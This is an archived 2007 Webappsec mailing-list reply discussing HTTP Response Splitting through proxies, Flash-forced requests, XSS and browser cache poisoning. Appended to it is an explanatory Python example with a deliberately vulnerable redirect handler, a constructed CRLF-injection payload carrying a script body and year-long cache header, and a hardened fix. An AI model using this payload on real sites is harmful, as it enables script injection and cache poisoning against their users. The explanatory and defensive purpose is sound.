WebApp Sec: Re: [Webappsec] Tacking A Difficult Problem - Solutions

Re: [Webappsec] Tacking A Difficult Problem - Solutions

From: Amit Klein <aksecurity_at_gmail.com>
Date: Fri, 20 Apr 2007 11:28:49 +0200

A few more comments...

Amit Klein wrote:
> If this is a public site, and people access it through a forward proxy
> (as I've seen several ISPs, universities, etc. force their clients to
> do), or a transparent proxy (ditto), then the attacker doesn't have to
> run malicious code on the client - the attacker can mount the attack
> directly, through the proxy (assuming the attacker has "legit" access to
> the same proxy). That's assuming at least one of the vulnerable scripts
> can be accessed over port 80 (non-HTTPS).
>
> Moreover, even if the attacker cannot access the proxy server (or the
> whole site must be accessed over HTTPS), HTTP Response Splitting can be
> used to elevate an existing XSS problem into something bigger (see the
> paper, pages 21-22).
And even if the attacker doesn't have direct access to the proxy, he/she
can force the client to conduct the attack, using Flash ("Sending
arbitrary HTTP requests with Flash 7/8 (+IE 6.0)",
http://www.securityfocus.com/archive/1/443391).

>> Sure you can split the response. But what exactly are you going to do
>> with the second one?
>>
>
> You can do XSS. See the paper - p.4 and pages 19-21.
And browser cache poisoning too.
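The two outcomes named in this exchange, XSS via the second response and cache poisoning of that response, can be shown end to end with a small model. The following is an added example written for this archive page; it is not code from the original post or from the paper it cites. The handler, the parser and the attacker value are all constructed for illustration: a redirect script that copies a query parameter into a Location header without stripping CR/LF, a naive message parser standing in for the proxy or browser that reads the connection, and the same handler hardened so the header cannot be terminated early.

```python
"""Added example (not from the original post): HTTP Response Splitting
turning one injected parameter into a second, attacker-controlled HTTP
response. Names such as redirect_vulnerable, redirect_hardened and
example.test are assumptions made for this illustration."""

from urllib.parse import quote

CRLF = "\r\n"


def redirect_vulnerable(lang: str) -> str:
    """Modelled vulnerable handler: writes an already URL-decoded query
    parameter verbatim into the Location header."""
    return (
        "HTTP/1.1 302 Found" + CRLF
        + "Location: http://example.test/by_lang/" + lang + CRLF
        + "Content-Length: 0" + CRLF
        + CRLF
    )


def redirect_hardened(lang: str) -> str:
    """Hardened handler: refuses CR/LF in header data and percent-encodes
    the remainder, so the value can never close the header section."""
    if "\r" in lang or "\n" in lang:
        raise ValueError("CR/LF not allowed in header value")
    return (
        "HTTP/1.1 302 Found" + CRLF
        + "Location: http://example.test/by_lang/" + quote(lang, safe="") + CRLF
        + "Content-Length: 0" + CRLF
        + CRLF
    )


def split_responses(stream: str) -> list:
    """Read a connection the way a naive proxy or browser would: status line,
    headers, then Content-Length bytes of body, repeated until the data no
    longer starts with an HTTP status line. Returns the messages found."""
    messages = []
    pos = 0
    while pos < len(stream):
        while stream.startswith(CRLF, pos):   # tolerate blank lines between messages
            pos += 2
        head_end = stream.find(CRLF + CRLF, pos)
        if head_end < 0:
            break
        lines = stream[pos:head_end].split(CRLF)
        status = lines[0]
        if not status.startswith("HTTP/"):    # trailing junk, not a message
            break
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_start = head_end + 4
        length = int(headers.get("content-length", "0"))
        messages.append({"status": status, "headers": headers,
                         "body": stream[body_start:body_start + length]})
        pos = body_start + length
    return messages


def hardened_rejects(value: str) -> bool:
    """True if the hardened handler refuses the value outright."""
    try:
        redirect_hardened(value)
    except ValueError:
        return True
    return False


# Constructed attacker value: ends the Location header, closes the first
# response with an empty body, then supplies a complete second response
# carrying a long cache lifetime (cache poisoning) and a script body (XSS).
SCRIPT = "<script>alert(document.cookie)</script>"
INJECTED = (
    "en" + CRLF
    + "Content-Length: 0" + CRLF
    + CRLF
    + "HTTP/1.1 200 OK" + CRLF
    + "Content-Type: text/html" + CRLF
    + "Cache-Control: public, max-age=31536000" + CRLF
    + "Content-Length: " + str(len(SCRIPT)) + CRLF
    + CRLF
    + SCRIPT
)


if __name__ == "__main__":
    for msg in split_responses(redirect_vulnerable(INJECTED)):
        print(msg["status"], msg["headers"].get("cache-control"), repr(msg["body"]))
    print("hardened rejects injected value:", hardened_rejects(INJECTED))
```

The parser is deliberately forgiving, since that is the property the attack relies on: whatever reads the connection next treats the second message as a real reply, and if that reader is a shared cache that has paired it with a request for some other page, the cache now serves the script body under that page's URL for as long as the injected Cache-Control allows. The hardened handler fixes the only thing under the application's control, which is never letting CR or LF from user data reach a header line.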

Received on Apr 20 2007